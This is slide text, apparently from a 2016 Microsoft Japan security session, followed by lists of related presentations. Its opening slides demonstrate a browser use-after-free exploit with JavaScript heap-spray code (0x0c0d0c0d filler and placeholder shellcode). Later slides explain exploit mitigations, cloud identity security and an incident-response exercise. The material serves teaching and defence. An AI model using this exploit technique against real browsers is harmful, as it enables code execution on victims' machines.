overwrite heap memory of deleted object }" 6. var a = Element1.srcElement; // Access the pointer to the deleted object, trigger crash } 7. </script> <body> 8. <span id="SpanID"><IMG src="/abcd.gif" onload="FRemove(event)" /> </span> 9. </body> </html> </body> </html> “COMENT” element var Element EventObject(value1) -- IMG -- var Array1 “AAA” x200 "SpanID“ element (.innerHTM) ① - ② “SpanID”のinnerHTMLが無 くなったので、”SpanID”自 体がFreeされる “SpanID”の子として生成さ れた、EventObjectもFreeさ れる “COMENT” element var Element EventObject(value1) -- IMG -- var Array1 “AAA” x200 "SpanID“ element (.innerHTM) ③ EventObjectはFree済みのため、Array1で上書 きをされているが、var Elementは、このアド レスを指している var Elementから仮想関数 , srcElementを呼び 出そうとするが、関数のアドレスが、“AAAA” で上書きをされている “COMENT” element var Element EventObject(value1) -- IMG -- var Array1 “AAA” x200 "SpanID“ element (.innerHTM) Array1[200] “AAAAAAAAAAAAAAA AAAAAAA” ④ - ⑥
Shellcodeを実行するためには --------- ECX 0xAAAAAAAA --------- --------- --------- --------- EAX --------- EAX+34 アクセス違反 0xAAAAAAAA ECXに読み込まれた値 ? サンプルコードでは、0xAAAAを書きこんでいたため、 アクセスバイオレーションになる Pointer #2 ECX Pointer #1 any any any any EAX Pointer #2 Top of Shell Code EAX+34 Shell Code Top of Shell Code Pointer #1 上書きしたヒープ内のアドレス 上書きしたヒープ内のアドレス 上書きしたヒープ内のアドレス ECXに上書きした ヒープ内のアドレスを 読み込ませる ? アクセスバイオレーションを回避して、 ShellCodeを実行するためには…
Heap SprayでShellcodeを実行する 0x0c0d0c0d ECX 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d EAX 0x0c0d0c0d 0x0c0d0c0d EAX+34 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d ・・・ 0x0c0d0c0d Shell Code 0x0c0d0c0d 0x0c0d0c0d ? ヒープスプレーによるポインタとコードの操作 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d ECX = EAX 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d ・・・ 0x0c0d0c0d Shell Code EAX+34 0x0c0d0c2f ? メモリイメージ 0x0c0d0c0dをCall 1. function HeapSpray() { Array2 = new Array(); var Shellcode = unescape( '%ucccc%ucccc'); // 仮の攻撃用のシェルコード var SprayValue = unescape('%u0c0d'); // スプレーして埋める用のNOPコード do { SprayValue += SprayValue } while( SprayValue.length < 870400 ); for (j = 0; j < 100; j++) Array2[j] = SprayValue + Shellcode; } 2. function FOverwrite() { buffer = "¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥ u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0 c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0 d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d"; for (i = 0; i < Array1.length; i++) { Array1[i].data = buffer; } var t = Element1.srcElement; // Access the pointer to the deleted object, trigger crash } 0x0c0d0c0d OR AL, 0D
攻撃手法と対策の推移 Attack Mitigation Smashing the stack (Aug, 1996) Visual Studio 2002 (Feb, 2002) –First release of /GS[7] Overwrite variables[2] (Feb, 2002) SEH Overwrite[1] (Sep, 2003) Visual Studio 2003 (Nov, 2003) –Arrays placed adjacent to GS cookie –/SAFESEH added[9] XP SP2 released (Aug, 2004) –Windows compiled with /GS and /SAFESEH –DEP Attack Mitigation Bypass NX[3] (Sep, 2005) Visual Studio 2005 (Nov, 2005) –Arguments copied to safe locals for /GS ASLR (Nov, 2006) –Included with Windows Vista –Attacks against ASLR already existed Weak GS entropy[5] (May, 2007) SEHOP(2008) GS V3(2010) [1] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 20003 Server.http://www.ngssoftware.com/papers/defeating-w2k3-stack-protection.pdf. [2] Ren, Chris et al. Microsoft Compiler Flaw Technical Note. http://www.cigital.com/news/index.php?pg=art&artid=70. [3] skape, Skywing. Bypassing Windows Hardware-enforced DEP. http://www.uninformed.org/?v=2&a=4&t=sumry. [4] skape. Preventing the Exploitation of SEH Overwrites. http://www.uninformed.org/?v=5&a=2&t=sumry. [5] skape. Reducing the Effective Entropy of GS Cookies. http://www.uninformed.org/?v=7&a=2&t=sumry. [7] Microsoft. /GS Compiler Switch. http://msdn2.microsoft.com/en-us/library/8dbf701c(VS.80).aspx. [9] Microsoft. /SAFESEH Compiler Switch. http://msdn2.microsoft.com/en-us/library/9a89h429(VS.80).aspx.
65
情報セキュリティはどこまでやればよいのか
PC 紛失からの情報流出のケース 検討結果の⾒直し
クラウド環境によるセキュリティ領域の拡張 デバイス管理安全な接続 Office 365 Dynamics Azure 社外の関係者 外部サービス • 社内外での 安全な データ交換 • 一元的な デバイスの 管理 • 社内外の ID統合(SSO) • 多要素認証 Azure RMS Azure ADP Intune Express Route 社内ネットワーク 認証基盤 データ保護 (暗号化) 柔軟で強靭な IT 基盤 管理基盤 ネットワーク 保護 Windows Server 2012 R2 Private Cloud 安全なサーバ Direct Access 社内ネットワークの外のPCを社内 ネットワークと同様の管理し、社 内ネットワークへの接続を提供 社内 / Cloud間を 専用線・VP接続 ATP ATA • 高度なマルウエア対策 • 安全なWeb閲覧 • 認証への攻撃検知
セキュリティ境界は、ネットワークからIDに移行 デバイス管理安全な接続 Office 365 Dynamics Azure 社外の関係者 外部サービス • 社内外での 安全な データ交換 • 一元的な デバイスの 管理 • 社内外の ID統合(SSO) • 多要素認証 Azure RMS Azure ADP Intune Express Route 社内ネットワーク 認証基盤 データ保護 (暗号化) 柔軟で強靭な IT 基盤 管理基盤 ネットワーク 保護 Windows Server 2012 R2 Private Cloud 安全なサーバ Direct Access 社内ネットワークの外のPCを社内 ネットワークと同様の管理し、社 内ネットワークへの接続を提供 社内 / Cloud間を 専用線・VP接続 ATP ATA • 高度なマルウエア対策 • 安全なWeb閲覧 • 認証への攻撃検知 ID ID ID ID ID ID ID ID ID
セキュリティ境界は、ネットワークからIDに移行 デバイス管理安全な接続 Office 365 Dynamics Azure 社外の関係者 外部サービス • 社内外での 安全な データ交換 • 一元的な デバイスの 管理 • 社内外の ID統合(SSO) • 多要素認証 Azure RMS Azure ADP Intune Express Route 社内ネットワーク 認証基盤 データ保護 (暗号化) 柔軟で強靭な IT 基盤 管理基盤 ネットワーク 保護 Windows Server 2012 R2 Private Cloud 安全なサーバ Direct Access 社内ネットワークの外のPCを社内 ネットワークと同様の管理し、社 内ネットワークへの接続を提供 社内 / Cloud間を 専用線・VP接続 ATP ATA • 高度なマルウエア対策 • 安全なWeb閲覧 • 認証への攻撃検知 ID ID ID ID ID ID ID ID ID IDM IDM ID
人・デバイス・データとともにログも分散する デバイス管理安全な接続 Office 365 Dynamics Azure 社外の関係者 外部サービス • 社内外での 安全な データ交換 • 一元的な デバイスの 管理 • 社内外の ID統合(SSO) • 多要素認証 Azure RMS Azure ADP Intune Express Route 社内ネットワーク 認証基盤 データ保護 (暗号化) 柔軟で強靭な IT 基盤 管理基盤 ネットワーク 保護 Windows Server 2012 R2 Private Cloud 安全なサーバ Direct Access 社内ネットワークの外のPCを社 内ネットワークと同様の管理し、 社内ネットワークへの接続を提供 社内 / Cloud間を 専用線・VP接続 ATP ATA • 高度なマルウエア対策 • 安全なWeb閲覧 • 認証への攻撃検知 ID ID ID ID ID ID ID ID ID
クラウドに収集し分析するという考え方 デバイス管理安全な接続 Office 365 Dynamics Azure 社外の関係者 外部サービス • 社内外での 安全な データ交換 • 一元的な デバイスの 管理 • 社内外の ID統合(SSO) • 多要素認証 Azure RMS Azure ADP Intune Express Route 社内ネットワーク 認証基盤 データ保護 (暗号化) 柔軟で強靭な IT 基盤 管理基盤 ネットワーク 保護 Windows Server 2012 R2 Private Cloud 安全なサーバ Direct Access 社内ネットワークの外のPCを社 内ネットワークと同様の管理し、 社内ネットワークへの接続を提供 社内 / Cloud間を 専用線・VP接続 ATP ATA • 高度なマルウエア対策 • 安全なWeb閲覧 • 認証への攻撃検知 ID ID ID ID ID ID ID ID ID IDM ID
教育・訓練による 人的な軽減策 イベントの検出・検知 イベントの人的な調査 事案の対応 多 中 少 微 特 高 中 低 対策による 絞り込み 対応コスト 基本的な技術面の セキュリティ対策 事案による損害
運 用 基 盤 必要とされる対策とその要素 対策のフェーズ・要素 Protect 対策 (ESAE) Detect 検出 (MTDS) Response 対応 (PADS) Assessment 評価・検証 (MSRA) Management and Monitor 管理・運用とモニター (MOF/ATA) Exercise 演習・訓練 (Workshop) Recover 復旧 (ESAE) 不正アクセス 対策 統制の仕組み 具体的な設定 USCGB等 アプリ APT対策 特権保護 ProcessPeople Product (Technology) ID管理 情報保護 情報の分類と 分離 暗号 アクセス管理 ボリューム 保護 ファイルの 保護 データの 保護 人とプロセスの マネジメント 教育・啓発 ISMS 監査 運用手順 (Procedure) ポリシー スタンダード モニタと計測 演習・訓練 事業継続(BCP) ネット OS セキュリティ ツール デバイス (ハード) 人材・組織
事件発覚 想定される発表内容 • 漏えいした情報の種類、 • 影響を受ける顧客数と特徴 • 想定される二次被害 • 推奨する対策 • 事故の原因・要因 • 事業への影響の有無 • 再発防止策 ある日、「事件発覚」の中のひとつの項目が報告された。事件を公表するかどうかを、至急判断しなくてはならない。 公表するものとして、「想定される発表内容」をまとめる事は可能か、また、どの程度の時間が必要か。 担当者などの整理 • 責任者(CEO, CIO, CTO, CSO, CISO?) • 報道対応 • 事故調査、まとめ • 法的な検討 • 顧客対応 • その他 • 弊社のメールアカウントを使った、標的メールが 取引先に送信された • 弊社が所有するIPアドレスから攻撃を受けているとの クレームが入った • インターネット上の掲示板に弊社の顧客情報を含む ドキュメントが掲載されている • 顧客から、弊社にしか登録をしていない「クレジット カードが勝手に使われた」とのクレームが入った • 弊社にしか登録をしていない「メールアドレスに広告が 入った」とのクレームが、今日になって3件目入った • WEBページから顧客情報が閲覧可能な状態にある • ハッカーの侵入を受けて、すべてのメールがインターネット に公開された • 標的型攻撃で機密情報が漏れた可能性があることが、警察 とJPCERT/CCからの連絡で判明した
アンケートにご協力ください。 ●アンケートに 上記の Session ID のブレイクアウトセッションに チェックを入れて下さい。 ●アンケートはお帰りの際に、受付でご提出ください。 マイクロソフトスペシャルグッズと引換えさせていただきます。
ROOM L Ask the Speaker のご案内 ●本セッションの詳細は、EXPO 会場内 『Ask the Speaker』コーナー Room L カウンタにてご説明させて いただきます。是非、お立ち寄りください。 Ask the Speaker EXPO会場MAP
© 2016 Microsoft Corporation. All rights reserved.
https://www.microsoft.com/ja-jp/security/default.aspx
https://blogs.technet.microsoft.com/jpsecurity/ https://www.microsoft.com/ja-jp/security/resources/sir.aspx セキュリティ インテリジェンスレポート日本のセキュリティチームBLOG
https://www.microsoft.com/en-us/sdl/default.aspx https://technet.microsoft.com/ja-jp/security/jj554736
https://www.microsoft.com/ja-jp/business/enterprise-security/default.aspx https://www.microsoft.com/ja-jp/business/publicsector/solution/campaign-security.aspx
http://special.nikkeibp.co.jp/atcl/NBO/16/microsoft0330/

Recommended

[data security showcase Sapporo 2015] D22:今求められるセキュリティレベルとFireEye適応型防御 by ファイ...
[data security showcase Sapporo 2015] D22:今求められるセキュリティレベルとFireEye適応型防御 by ファイ...[data security showcase Sapporo 2015] D22:今求められるセキュリティレベルとFireEye適応型防御 by ファイ...
[data security showcase Sapporo 2015] D22:今求められるセキュリティレベルとFireEye適応型防御 by ファイ...Insight Technology, Inc.
 
クラウド時代のストレージ機能の利活用とデータセキュリティを実現するアプローチ
クラウド時代のストレージ機能の利活用とデータセキュリティを実現するアプローチクラウド時代のストレージ機能の利活用とデータセキュリティを実現するアプローチ
クラウド時代のストレージ機能の利活用とデータセキュリティを実現するアプローチNetApp Japan
 
標的型攻撃にいかに立ち向かうか~巧妙化する脅威に組織がとるべき対策とは~竹内 文孝
標的型攻撃にいかに立ち向かうか~巧妙化する脅威に組織がとるべき対策とは~竹内 文孝標的型攻撃にいかに立ち向かうか~巧妙化する脅威に組織がとるべき対策とは~竹内 文孝
標的型攻撃にいかに立ち向かうか~巧妙化する脅威に組織がとるべき対策とは~竹内 文孝Fumitaka Takeuchi
 
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010Sen Ueno
 
組織にばれない情報漏洩の手法
組織にばれない情報漏洩の手法組織にばれない情報漏洩の手法
組織にばれない情報漏洩の手法Lumin Hacker
 
Gartnerサミット ver1 0 20150713forprint
Gartnerサミット ver1 0 20150713forprintGartnerサミット ver1 0 20150713forprint
Gartnerサミット ver1 0 20150713forprintsatoru koyama
 
天職の就き方 〜 ぼくらが旅に出る理由 Part 2 #ssmjp 1501
天職の就き方 〜 ぼくらが旅に出る理由 Part 2 #ssmjp 1501天職の就き方 〜 ぼくらが旅に出る理由 Part 2 #ssmjp 1501
天職の就き方 〜 ぼくらが旅に出る理由 Part 2 #ssmjp 1501Sen Ueno
 
INF-022_情報漏えいを責めるべからず。今必要な対策とは? ~Windows 10 セキュリティ機能徹底解説~
INF-022_情報漏えいを責めるべからず。今必要な対策とは? ~Windows 10 セキュリティ機能徹底解説~INF-022_情報漏えいを責めるべからず。今必要な対策とは? ~Windows 10 セキュリティ機能徹底解説~
INF-022_情報漏えいを責めるべからず。今必要な対策とは? ~Windows 10 セキュリティ機能徹底解説~decode2016
 

Recommended

[data security showcase Sapporo 2015] D22:今求められるセキュリティレベルとFireEye適応型防御 by ファイ...
[data security showcase Sapporo 2015] D22:今求められるセキュリティレベルとFireEye適応型防御 by ファイ...[data security showcase Sapporo 2015] D22:今求められるセキュリティレベルとFireEye適応型防御 by ファイ...
[data security showcase Sapporo 2015] D22:今求められるセキュリティレベルとFireEye適応型防御 by ファイ...Insight Technology, Inc.
 
クラウド時代のストレージ機能の利活用とデータセキュリティを実現するアプローチ
クラウド時代のストレージ機能の利活用とデータセキュリティを実現するアプローチクラウド時代のストレージ機能の利活用とデータセキュリティを実現するアプローチ
クラウド時代のストレージ機能の利活用とデータセキュリティを実現するアプローチNetApp Japan
 
標的型攻撃にいかに立ち向かうか~巧妙化する脅威に組織がとるべき対策とは~竹内 文孝
標的型攻撃にいかに立ち向かうか~巧妙化する脅威に組織がとるべき対策とは~竹内 文孝標的型攻撃にいかに立ち向かうか~巧妙化する脅威に組織がとるべき対策とは~竹内 文孝
標的型攻撃にいかに立ち向かうか~巧妙化する脅威に組織がとるべき対策とは~竹内 文孝Fumitaka Takeuchi
 
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010Sen Ueno
 
組織にばれない情報漏洩の手法
組織にばれない情報漏洩の手法組織にばれない情報漏洩の手法
組織にばれない情報漏洩の手法Lumin Hacker
 
Gartnerサミット ver1 0 20150713forprint
Gartnerサミット ver1 0 20150713forprintGartnerサミット ver1 0 20150713forprint
Gartnerサミット ver1 0 20150713forprintsatoru koyama
 
天職の就き方 〜 ぼくらが旅に出る理由 Part 2 #ssmjp 1501
天職の就き方 〜 ぼくらが旅に出る理由 Part 2 #ssmjp 1501天職の就き方 〜 ぼくらが旅に出る理由 Part 2 #ssmjp 1501
天職の就き方 〜 ぼくらが旅に出る理由 Part 2 #ssmjp 1501Sen Ueno
 
INF-022_情報漏えいを責めるべからず。今必要な対策とは? ~Windows 10 セキュリティ機能徹底解説~
INF-022_情報漏えいを責めるべからず。今必要な対策とは? ~Windows 10 セキュリティ機能徹底解説~INF-022_情報漏えいを責めるべからず。今必要な対策とは? ~Windows 10 セキュリティ機能徹底解説~
INF-022_情報漏えいを責めるべからず。今必要な対策とは? ~Windows 10 セキュリティ機能徹底解説~decode2016
 
最近の事例におけるサイバー攻撃の傾向と対策
最近の事例におけるサイバー攻撃の傾向と対策最近の事例におけるサイバー攻撃の傾向と対策
最近の事例におけるサイバー攻撃の傾向と対策itforum-roundtable
 
サイバー攻撃の脅威が増大する中、 我が国の情報セキュリティ政策の現状
サイバー攻撃の脅威が増大する中、 我が国の情報セキュリティ政策の現状サイバー攻撃の脅威が増大する中、 我が国の情報セキュリティ政策の現状
サイバー攻撃の脅威が増大する中、 我が国の情報セキュリティ政策の現状itforum-roundtable
 
自治体セキュリティ強靭化対策のためのシンクライアント入門
自治体セキュリティ強靭化対策のためのシンクライアント入門自治体セキュリティ強靭化対策のためのシンクライアント入門
自治体セキュリティ強靭化対策のためのシンクライアント入門Minna no Cloud, General Incorporated Associates
 
政府機関における情報セキュリティ対策について
政府機関における情報セキュリティ対策について政府機関における情報セキュリティ対策について
政府機関における情報セキュリティ対策についてitforum-roundtable
 
セキュリティ強靭性向上対策モデルの実現
セキュリティ強靭性向上対策モデルの実現セキュリティ強靭性向上対策モデルの実現
セキュリティ強靭性向上対策モデルの実現KitASP_Corporation
 
アカウントハッキングと戦う!モバイルゲームに今、求められるセキュリティ
アカウントハッキングと戦う!モバイルゲームに今、求められるセキュリティアカウントハッキングと戦う!モバイルゲームに今、求められるセキュリティ
アカウントハッキングと戦う!モバイルゲームに今、求められるセキュリティNHN テコラス株式会社
 
SOFTCAMP SHIELDEX 詳細な紹介資料及び ​導入事例
SOFTCAMP SHIELDEX 詳細な紹介資料及び ​導入事例SOFTCAMP SHIELDEX 詳細な紹介資料及び ​導入事例
SOFTCAMP SHIELDEX 詳細な紹介資料及び ​導入事例Softcamp Co., Ltd.
 
SOFTCAMP SHIELDEX SaniTrans Mail
SOFTCAMP SHIELDEX SaniTrans Mail SOFTCAMP SHIELDEX SaniTrans Mail
SOFTCAMP SHIELDEX SaniTrans Mail Softcamp Co., Ltd.
 
情報セキュリティの概要
情報セキュリティの概要情報セキュリティの概要
情報セキュリティの概要Tokai University
 
改ざん検知の分類資料
改ざん検知の分類資料改ざん検知の分類資料
改ざん検知の分類資料Kouji Uchiyama
 
できることから始めるセキュリティ対策
できることから始めるセキュリティ対策できることから始めるセキュリティ対策
できることから始めるセキュリティ対策NHN テコラス株式会社
 
関西セキュリティ 合同セミナー改ざん検知の分類資料
関西セキュリティ 合同セミナー改ざん検知の分類資料関西セキュリティ 合同セミナー改ざん検知の分類資料
関西セキュリティ 合同セミナー改ざん検知の分類資料Kouji Uchiyama
 
プロも認める! NetScalerならここまで出来る「リスト型攻撃」対策
プロも認める! NetScalerならここまで出来る「リスト型攻撃」対策プロも認める! NetScalerならここまで出来る「リスト型攻撃」対策
プロも認める! NetScalerならここまで出来る「リスト型攻撃」対策Citrix Systems Japan
 
「情報セキュリティ10大脅威2017」 から読み取る最新セキュリティ傾向とその対策
「情報セキュリティ10大脅威2017」 から読み取る最新セキュリティ傾向とその対策 「情報セキュリティ10大脅威2017」 から読み取る最新セキュリティ傾向とその対策
「情報セキュリティ10大脅威2017」 から読み取る最新セキュリティ傾向とその対策 NHN テコラス株式会社
 
2017年のセキュリティ 傾向と対策講座
2017年のセキュリティ 傾向と対策講座2017年のセキュリティ 傾向と対策講座
2017年のセキュリティ 傾向と対策講座NHN テコラス株式会社
 
MSC 2010 T2-1 クラウドで企業の PC 運用管理が変わる! Windows Intune (基本編)
MSC 2010 T2-1 クラウドで企業の PC 運用管理が変わる! Windows Intune (基本編)MSC 2010 T2-1 クラウドで企業の PC 運用管理が変わる! Windows Intune (基本編)
MSC 2010 T2-1 クラウドで企業の PC 運用管理が変わる! Windows Intune (基本編)kumo2010
 
JPC2017 [D4] Microsoft 365 が実現するデジタル時代のセキュリティ
JPC2017 [D4] Microsoft 365 が実現するデジタル時代のセキュリティJPC2017 [D4] Microsoft 365 が実現するデジタル時代のセキュリティ
JPC2017 [D4] Microsoft 365 が実現するデジタル時代のセキュリティMPN Japan
 
A16_VB でクラサバシステムの開発をしていた平凡なチームが、どのようにクラウドネイティブプロダクト開発にシフトしアジャイル開発を進めることができたのか...
A16_VB でクラサバシステムの開発をしていた平凡なチームが、どのようにクラウドネイティブプロダクト開発にシフトしアジャイル開発を進めることができたのか...A16_VB でクラサバシステムの開発をしていた平凡なチームが、どのようにクラウドネイティブプロダクト開発にシフトしアジャイル開発を進めることができたのか...
A16_VB でクラサバシステムの開発をしていた平凡なチームが、どのようにクラウドネイティブプロダクト開発にシフトしアジャイル開発を進めることができたのか...日本マイクロソフト株式会社
 
”もと”中の人が語り尽くすSoftLayerセキュリティー(2016/10/13更新版)
”もと”中の人が語り尽くすSoftLayerセキュリティー(2016/10/13更新版)”もと”中の人が語り尽くすSoftLayerセキュリティー(2016/10/13更新版)
”もと”中の人が語り尽くすSoftLayerセキュリティー(2016/10/13更新版)Shinobu Yasuda
 
20180224 azure securitycenter
20180224 azure securitycenter20180224 azure securitycenter
20180224 azure securitycenterMasakazu Kishima
 
Monacaエンタープライズのご紹介
Monacaエンタープライズのご紹介Monacaエンタープライズのご紹介
Monacaエンタープライズのご紹介アシアル株式会社
 
【Interop tokyo 2014】 ビッグデータを活用し、被害を予見! シスコの新たなセキュリティ運用モデル
【Interop tokyo 2014】 ビッグデータを活用し、被害を予見! シスコの新たなセキュリティ運用モデル【Interop tokyo 2014】 ビッグデータを活用し、被害を予見! シスコの新たなセキュリティ運用モデル
【Interop tokyo 2014】 ビッグデータを活用し、被害を予見! シスコの新たなセキュリティ運用モデルシスコシステムズ合同会社
 

More Related Content

What's hot

最近の事例におけるサイバー攻撃の傾向と対策
最近の事例におけるサイバー攻撃の傾向と対策最近の事例におけるサイバー攻撃の傾向と対策
最近の事例におけるサイバー攻撃の傾向と対策itforum-roundtable
 
サイバー攻撃の脅威が増大する中、 我が国の情報セキュリティ政策の現状
サイバー攻撃の脅威が増大する中、 我が国の情報セキュリティ政策の現状サイバー攻撃の脅威が増大する中、 我が国の情報セキュリティ政策の現状
サイバー攻撃の脅威が増大する中、 我が国の情報セキュリティ政策の現状itforum-roundtable
 
政府機関における情報セキュリティ対策について
政府機関における情報セキュリティ対策について政府機関における情報セキュリティ対策について
政府機関における情報セキュリティ対策についてitforum-roundtable
 
セキュリティ強靭性向上対策モデルの実現
セキュリティ強靭性向上対策モデルの実現セキュリティ強靭性向上対策モデルの実現
セキュリティ強靭性向上対策モデルの実現KitASP_Corporation
 
アカウントハッキングと戦う!モバイルゲームに今、求められるセキュリティ
アカウントハッキングと戦う!モバイルゲームに今、求められるセキュリティアカウントハッキングと戦う!モバイルゲームに今、求められるセキュリティ
アカウントハッキングと戦う!モバイルゲームに今、求められるセキュリティNHN テコラス株式会社
 
SOFTCAMP SHIELDEX 詳細な紹介資料及び ​導入事例
SOFTCAMP SHIELDEX 詳細な紹介資料及び ​導入事例SOFTCAMP SHIELDEX 詳細な紹介資料及び ​導入事例
SOFTCAMP SHIELDEX 詳細な紹介資料及び ​導入事例Softcamp Co., Ltd.
 
SOFTCAMP SHIELDEX SaniTrans Mail
SOFTCAMP SHIELDEX SaniTrans Mail SOFTCAMP SHIELDEX SaniTrans Mail
SOFTCAMP SHIELDEX SaniTrans Mail Softcamp Co., Ltd.
 
情報セキュリティの概要
情報セキュリティの概要情報セキュリティの概要
情報セキュリティの概要Tokai University
 
改ざん検知の分類資料
改ざん検知の分類資料改ざん検知の分類資料
改ざん検知の分類資料Kouji Uchiyama
 
できることから始めるセキュリティ対策
できることから始めるセキュリティ対策できることから始めるセキュリティ対策
できることから始めるセキュリティ対策NHN テコラス株式会社
 
関西セキュリティ 合同セミナー改ざん検知の分類資料
関西セキュリティ 合同セミナー改ざん検知の分類資料関西セキュリティ 合同セミナー改ざん検知の分類資料
関西セキュリティ 合同セミナー改ざん検知の分類資料Kouji Uchiyama
 
プロも認める! NetScalerならここまで出来る「リスト型攻撃」対策
プロも認める! NetScalerならここまで出来る「リスト型攻撃」対策プロも認める! NetScalerならここまで出来る「リスト型攻撃」対策
プロも認める! NetScalerならここまで出来る「リスト型攻撃」対策Citrix Systems Japan
 
「情報セキュリティ10大脅威2017」 から読み取る最新セキュリティ傾向とその対策
「情報セキュリティ10大脅威2017」 から読み取る最新セキュリティ傾向とその対策 「情報セキュリティ10大脅威2017」 から読み取る最新セキュリティ傾向とその対策
「情報セキュリティ10大脅威2017」 から読み取る最新セキュリティ傾向とその対策 NHN テコラス株式会社
 
2017年のセキュリティ 傾向と対策講座
2017年のセキュリティ 傾向と対策講座2017年のセキュリティ 傾向と対策講座
2017年のセキュリティ 傾向と対策講座NHN テコラス株式会社
 

What's hot (15)

最近の事例におけるサイバー攻撃の傾向と対策
最近の事例におけるサイバー攻撃の傾向と対策最近の事例におけるサイバー攻撃の傾向と対策
最近の事例におけるサイバー攻撃の傾向と対策
 
サイバー攻撃の脅威が増大する中、 我が国の情報セキュリティ政策の現状
サイバー攻撃の脅威が増大する中、 我が国の情報セキュリティ政策の現状サイバー攻撃の脅威が増大する中、 我が国の情報セキュリティ政策の現状
サイバー攻撃の脅威が増大する中、 我が国の情報セキュリティ政策の現状
 
自治体セキュリティ強靭化対策のためのシンクライアント入門
自治体セキュリティ強靭化対策のためのシンクライアント入門自治体セキュリティ強靭化対策のためのシンクライアント入門
自治体セキュリティ強靭化対策のためのシンクライアント入門
 
政府機関における情報セキュリティ対策について
政府機関における情報セキュリティ対策について政府機関における情報セキュリティ対策について
政府機関における情報セキュリティ対策について
 
セキュリティ強靭性向上対策モデルの実現
セキュリティ強靭性向上対策モデルの実現セキュリティ強靭性向上対策モデルの実現
セキュリティ強靭性向上対策モデルの実現
 
アカウントハッキングと戦う!モバイルゲームに今、求められるセキュリティ
アカウントハッキングと戦う!モバイルゲームに今、求められるセキュリティアカウントハッキングと戦う!モバイルゲームに今、求められるセキュリティ
アカウントハッキングと戦う!モバイルゲームに今、求められるセキュリティ
 
SOFTCAMP SHIELDEX 詳細な紹介資料及び ​導入事例
SOFTCAMP SHIELDEX 詳細な紹介資料及び ​導入事例SOFTCAMP SHIELDEX 詳細な紹介資料及び ​導入事例
SOFTCAMP SHIELDEX 詳細な紹介資料及び ​導入事例
 
SOFTCAMP SHIELDEX SaniTrans Mail
SOFTCAMP SHIELDEX SaniTrans Mail SOFTCAMP SHIELDEX SaniTrans Mail
SOFTCAMP SHIELDEX SaniTrans Mail
 
情報セキュリティの概要
情報セキュリティの概要情報セキュリティの概要
情報セキュリティの概要
 
改ざん検知の分類資料
改ざん検知の分類資料改ざん検知の分類資料
改ざん検知の分類資料
 
できることから始めるセキュリティ対策
できることから始めるセキュリティ対策できることから始めるセキュリティ対策
できることから始めるセキュリティ対策
 
関西セキュリティ 合同セミナー改ざん検知の分類資料
関西セキュリティ 合同セミナー改ざん検知の分類資料関西セキュリティ 合同セミナー改ざん検知の分類資料
関西セキュリティ 合同セミナー改ざん検知の分類資料
 
プロも認める! NetScalerならここまで出来る「リスト型攻撃」対策
プロも認める! NetScalerならここまで出来る「リスト型攻撃」対策プロも認める! NetScalerならここまで出来る「リスト型攻撃」対策
プロも認める! NetScalerならここまで出来る「リスト型攻撃」対策
 
「情報セキュリティ10大脅威2017」 から読み取る最新セキュリティ傾向とその対策
「情報セキュリティ10大脅威2017」 から読み取る最新セキュリティ傾向とその対策 「情報セキュリティ10大脅威2017」 から読み取る最新セキュリティ傾向とその対策
「情報セキュリティ10大脅威2017」 から読み取る最新セキュリティ傾向とその対策
 
2017年のセキュリティ 傾向と対策講座
2017年のセキュリティ 傾向と対策講座2017年のセキュリティ 傾向と対策講座
2017年のセキュリティ 傾向と対策講座
 

Similar to ARC-006_サイバー セキュリティ、IT Pro、開発、経営 それぞれの視点

MSC 2010 T2-1 クラウドで企業の PC 運用管理が変わる! Windows Intune (基本編)
MSC 2010 T2-1 クラウドで企業の PC 運用管理が変わる! Windows Intune (基本編)MSC 2010 T2-1 クラウドで企業の PC 運用管理が変わる! Windows Intune (基本編)
MSC 2010 T2-1 クラウドで企業の PC 運用管理が変わる! Windows Intune (基本編)kumo2010
 
JPC2017 [D4] Microsoft 365 が実現するデジタル時代のセキュリティ
JPC2017 [D4] Microsoft 365 が実現するデジタル時代のセキュリティJPC2017 [D4] Microsoft 365 が実現するデジタル時代のセキュリティ
JPC2017 [D4] Microsoft 365 が実現するデジタル時代のセキュリティMPN Japan
 
A16_VB でクラサバシステムの開発をしていた平凡なチームが、どのようにクラウドネイティブプロダクト開発にシフトしアジャイル開発を進めることができたのか...
A16_VB でクラサバシステムの開発をしていた平凡なチームが、どのようにクラウドネイティブプロダクト開発にシフトしアジャイル開発を進めることができたのか...A16_VB でクラサバシステムの開発をしていた平凡なチームが、どのようにクラウドネイティブプロダクト開発にシフトしアジャイル開発を進めることができたのか...
A16_VB でクラサバシステムの開発をしていた平凡なチームが、どのようにクラウドネイティブプロダクト開発にシフトしアジャイル開発を進めることができたのか...日本マイクロソフト株式会社
 
”もと”中の人が語り尽くすSoftLayerセキュリティー(2016/10/13更新版)
